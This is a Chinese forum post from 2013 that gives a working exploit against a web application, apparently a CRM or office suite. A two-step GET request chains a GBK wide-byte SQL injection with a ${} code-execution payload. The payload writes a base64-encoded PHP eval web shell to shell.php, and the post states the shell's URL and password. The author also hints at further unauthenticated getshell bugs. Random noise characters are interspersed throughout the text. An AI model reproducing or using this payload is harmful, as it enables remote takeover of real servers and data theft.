此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了. p/ W- S: A( ] U$ I$ I5 s' K3 S# Y
. X7 A: @3 F: F! y& g
4 D' e) b0 \- d9 V$ aEXP:: y* p1 l0 R6 q- ]9 S3 i
P9 m' {" _3 t9 z; G# W. s% o
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}2 r0 @, k# }, y3 E1 a" v$ g
^1 q! V7 T3 x- ~ U7 |第二步: [GET]http://site/general/email/index.php9 K' O5 O2 d {' R* F" ^
& S8 G; {9 c" W% _( L; PSHELL: http://site/general/email/shell.php 密码C
! f( m% S7 @- Z; s ) P. N9 ?, y# q
& o) I2 |8 ], s- n; r' ~: W# A此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好3 V- p! N' z& G( t
( Y6 T3 s9 l$ e, W5 @% e0 I$ l: N有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
. k5 v% W7 w. `0 s3 v: z1 w
1 ~. Y( d* t" E" R) \. K- E0 T' j0 I8 i5 a% ?% u, L
|
发表于 2013-2-4 16:19:29
收藏
支持
反对